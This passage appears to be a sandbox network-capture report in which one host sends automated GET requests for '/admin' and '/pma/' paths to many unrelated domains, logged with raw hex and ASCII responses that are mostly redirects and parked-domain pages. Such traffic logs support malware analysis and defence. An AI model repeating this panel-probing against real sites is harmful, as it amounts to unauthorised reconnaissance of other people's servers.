Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
262	192.168.2.4	60250	194.63.248.47	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.162360907 CET	216	OUT	GET /admin HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.364644051 CET	522	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:48 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/admin Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/admin">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
263	192.168.2.4	60850	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.404922009 CET	217	OUT	GET /admin HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.774200916 CET	877	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:48 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Crn8+XH/7BjOKK31y9VppMLlrvQ9iIkf6iP+YiITDtxldJJdU62fsCBRew9dSzvN9GZwnjV7G6N+mX4RhlH0YA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.119.144.209;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:48.980544090 CET	877	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:48 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Crn8+XH/7BjOKK31y9VppMLlrvQ9iIkf6iP+YiITDtxldJJdU62fsCBRew9dSzvN9GZwnjV7G6N+mX4RhlH0YA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.119.144.209;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
264	192.168.2.4	60851	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.702238083 CET	218	OUT	GET /admin HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.881278038 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:48 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:48.881895065 CET	213	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:49.064826012 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:48 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:48 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=turqrngkas4lf23k7h4713t4k1; path=/ Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en
Nov 30, 2023 11:22:49.064838886 CET	1340	IN	Data Raw: 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 Data Ascii: -GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\0751\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></
Nov 30, 2023 11:22:49.064862013 CET	1340	IN	Data Raw: 65 20 66 6f 72 20 73 61 6c 65 20 6f 72 20 6c 65 61 73 65 3c 2f 61 3e 3c 2f 68 32 3e 0a 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c Data Ascii: e for sale or lease</a></h2><p>If you are interested in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div>
Nov 30, 2023 11:22:49.064878941 CET	735	IN	Data Raw: 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 75 62 6d 69 74 20 26 72 61 71 75 6f 3b 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f Data Ascii: ="submit" value="Submit »"></div></div><div class="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><di

Session ID	Source IP	Source Port	Destination IP	Destination Port
265	192.168.2.4	60733	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.703187943 CET	217	OUT	GET /admin/ HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.803832054 CET	875	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:48 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_PgK7lg7WO/wixhmv8QF5VrbNA6DAK0NHlNnZxeKvyjojJTyChnQLAQiriszmxATPmxMsCc6oTyzpNHlmXtqVOw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
266	192.168.2.4	61363	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:49.208018064 CET	221	OUT	GET /admin HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:49.322137117 CET	564	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.651070=db5cfb35-0d95-4dd2-8820-2206597ac2ba; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:22 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
267	192.168.2.4	61362	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:49.208092928 CET	219	OUT	GET /admin HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:49.321779966 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=0515a65d-3be8-4784-a15e-d8f62abba10f; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:21 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
268	192.168.2.4	61732	104.238.144.219	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:49.339308977 CET	219	OUT	GET /admin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:49.470040083 CET	532	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:49 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/admin/ Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/admin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
269	192.168.2.4	62512	54.209.32.212	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:49.653425932 CET	217	OUT	GET /pma/ HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:49.752661943 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:48 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
270	192.168.2.4	62604	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:49.785408974 CET	217	OUT	GET / HTTP/1.1 Host: www.hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:49.966917992 CET	1340	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:22:49 GMT Server: Apache/2.4.57 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:49 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=4ubp5hfv7s3oflhfo3au02ar32; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1625 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI
Nov 30, 2023 11:22:49.966939926 CET	833	IN	Data Raw: ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 Data Ascii: 0&qUQmptnAq#Voj}!-5MjnOB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<

Session ID	Source IP	Source Port	Destination IP	Destination Port
271	192.168.2.4	62896	54.209.32.212	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:49.859786034 CET	218	OUT	GET /admin HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:49.959841967 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:49 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
272	192.168.2.4	62853	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
